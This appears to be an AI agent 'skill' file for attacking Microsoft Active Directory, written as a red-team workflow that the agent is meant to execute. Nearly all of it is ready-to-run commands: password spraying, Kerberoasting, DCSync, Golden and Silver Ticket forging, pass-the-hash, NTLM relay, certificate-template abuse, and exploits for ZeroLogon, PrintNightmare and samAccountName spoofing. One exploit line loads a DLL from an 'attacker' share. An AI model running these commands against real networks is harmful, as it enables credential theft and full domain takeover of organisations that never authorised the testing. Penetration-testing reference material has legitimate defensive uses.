Active Directory Attacks Purpose Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing. Inputs/Prerequisites Kali Linux or Windows attack platform Domain user credentials (for most attacks) Network access to Domain Controller Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec Outputs/Deliverables Domain enumeration data Extracted credentials and hashes Kerberos tickets for impersonation Domain Administrator access Persistent access mechanisms Essential Tools Tool Purpose BloodHound AD attack path visualization Impacket Python AD attack tools Mimikatz Credential extraction Rubeus Kerberos attacks CrackMapExec Network exploitation PowerView AD enumeration Responder LLMNR/NBT-NS poisoning Core Workflow Step 1: Kerberos Clock Sync Kerberos requires clock synchronization (±5 minutes):
Detect clock skew
nmap -sT 10.10 .10.10 -p445 --script smb2-time
Fix clock on Linux
sudo date -s "14 APR 2024 18:25:16"
Fix clock on Windows
net time /domain /set
Fake clock without changing system time
faketime -f '+8h' < command
Step 2: AD Reconnaissance with BloodHound
Start BloodHound
neo4j console bloodhound --no-sandbox
Collect data with SharpHound
. \ SharpHound.exe -c All . \ SharpHound.exe -c All --ldapusername user --ldappassword pass
Python collector (from Linux)
bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10 .10.10 -c all Step 3: PowerView Enumeration
Get domain info
Get-NetDomain Get-DomainSID Get-NetDomainController
Enumerate users
Get-NetUser Get-NetUser - SamAccountName targetuser Get-UserProperty - Properties pwdlastset
Enumerate groups
Get-NetGroupMember
GroupName "Domain Admins" Get-DomainGroup - Identity "Domain Admins" | Select-Object - ExpandProperty Member
Find local admin access
Find-LocalAdminAccess
Verbose
User hunting
Invoke-UserHunter Invoke-UserHunter - Stealth Credential Attacks Password Spraying
Using kerbrute
./kerbrute passwordspray -d domain.local --dc 10.10 .10.10 users.txt Password123
Using CrackMapExec
crackmapexec smb 10.10 .10.10 -u users.txt -p 'Password123' --continue-on-success Kerberoasting Extract service account TGS tickets and crack offline:
Impacket
GetUserSPNs.py domain.local/user:password -dc-ip 10.10 .10.10 -request -outputfile hashes.txt
Rubeus
. \ Rubeus.exe kerberoast /outfile:hashes.txt
CrackMapExec
crackmapexec ldap 10.10 .10.10 -u user -p password --kerberoast output.txt
Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt AS-REP Roasting Target accounts with "Do not require Kerberos preauthentication":
Impacket
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10 .10.10 -format hashcat
Rubeus
. \ Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
Crack with hashcat
hashcat -m 18200 hashes.txt rockyou.txt DCSync Attack Extract credentials directly from DC (requires Replicating Directory Changes rights):
Impacket
secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
Mimikatz
lsadump::dcsync /domain:domain.local /user:krbtgt lsadump::dcsync /domain:domain.local /user:Administrator Kerberos Ticket Attacks Pass-the-Ticket (Golden Ticket) Forge TGT with krbtgt hash for any user:
Get krbtgt hash via DCSync first
Mimikatz - Create Golden Ticket
kerberos::golden / user:Administrator / domain:domain . local / sid:S-1-5-21-xxx / krbtgt:HASH / id:500 / ptt
Impacket
ticketer . py - nthash KRBTGT_HASH - domain-sid S-1-5-21-xxx - domain domain . local Administrator export KRB5CCNAME=Administrator . ccache psexec . py - k - no-pass domain . local/Administrator@dc . domain . local Silver Ticket Forge TGS for specific service:
Mimikatz
kerberos::golden / user:Administrator / domain:domain . local / sid:S-1-5-21-xxx / target:server . domain . local / service:cifs / rc4:SERVICE_HASH / ptt Pass-the-Hash
Impacket
psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
CrackMapExec
crackmapexec smb 10.10 .10.10 -u Administrator -H NTHASH -d domain.local crackmapexec smb 10.10 .10.10 -u Administrator -H NTHASH --local-auth OverPass-the-Hash Convert NTLM hash to Kerberos ticket:
Impacket
getTGT.py domain.local/user -hashes :NTHASH export KRB5CCNAME = user.ccache
Rubeus
. \ Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt NTLM Relay Attacks Responder + ntlmrelayx
Start Responder (disable SMB/HTTP for relay)
responder -I eth0 -wrf
Start relay
ntlmrelayx.py -tf targets.txt -smb2support
LDAP relay for delegation attack
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access SMB Signing Check crackmapexec smb 10.10 .10.0/24 --gen-relay-list targets.txt Certificate Services Attacks (AD CS) ESC1 - Misconfigured Templates
Find vulnerable templates
certipy find -u user@domain.local -p password -dc-ip 10.10 .10.10
Exploit ESC1
certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
Authenticate with certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10 .10.10 ESC8 - Web Enrollment Relay ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController Critical CVEs ZeroLogon (CVE-2020-1472)
Check vulnerability
crackmapexec smb 10.10 .10.10 -u '' -p '' -M zerologon
Exploit
python3 cve-2020-1472-exploit.py DC01 10.10 .10.10
Extract hashes
secretsdump.py -just-dc domain.local/DC01 \ $@ 10.10 .10.10 -no-pass
Restore password (important!)
python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10 .10.10 -hexpass HEXPASSWORD PrintNightmare (CVE-2021-1675)
Check for vulnerability
rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
Exploit (requires hosting malicious DLL)
python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\attacker\share\evil.dll' samAccountName Spoofing (CVE-2021-42278/42287)
Automated exploitation
python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10 .10.10 -shell Quick Reference Attack Tool Command Kerberoast Impacket GetUserSPNs.py domain/user:pass -request AS-REP Roast Impacket GetNPUsers.py domain/ -usersfile users.txt DCSync secretsdump secretsdump.py domain/admin:pass@DC Pass-the-Hash psexec psexec.py domain/user@target -hashes :HASH Golden Ticket Mimikatz kerberos::golden /user:Admin /krbtgt:HASH Spray kerbrute kerbrute passwordspray -d domain users.txt Pass Constraints Must: Synchronize time with DC before Kerberos attacks Have valid domain credentials for most attacks Document all compromised accounts Must Not: Lock out accounts with excessive password spraying Modify production AD objects without approval Leave Golden Tickets without documentation Should: Run BloodHound for attack path discovery Check for SMB signing before relay attacks Verify patch levels for CVE exploitation Examples Example 1: Domain Compromise via Kerberoasting
1. Find service accounts with SPNs
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10 .10.10
2. Request TGS tickets
GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10 .10.10 -request -outputfile tgs.txt
3. Crack tickets
hashcat -m 13100 tgs.txt rockyou.txt
4. Use cracked service account
psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10 Example 2: NTLM Relay to LDAP
1. Start relay targeting LDAP
ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
2. Trigger authentication (e.g., via PrinterBug)
python3 printerbug.py domain.local/user:pass@target 10.10 .10.12
3. Use created machine account for RBCD attack
Troubleshooting Issue Solution Clock skew too great Sync time with DC or use faketime Kerberoasting returns empty No service accounts with SPNs DCSync access denied Need Replicating Directory Changes rights NTLM relay fails Check SMB signing, try LDAP target BloodHound empty Verify collector ran with correct creds Additional Resources For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see references/advanced-attacks.md . When to Use This skill is applicable to execute the workflow or actions described in the overview.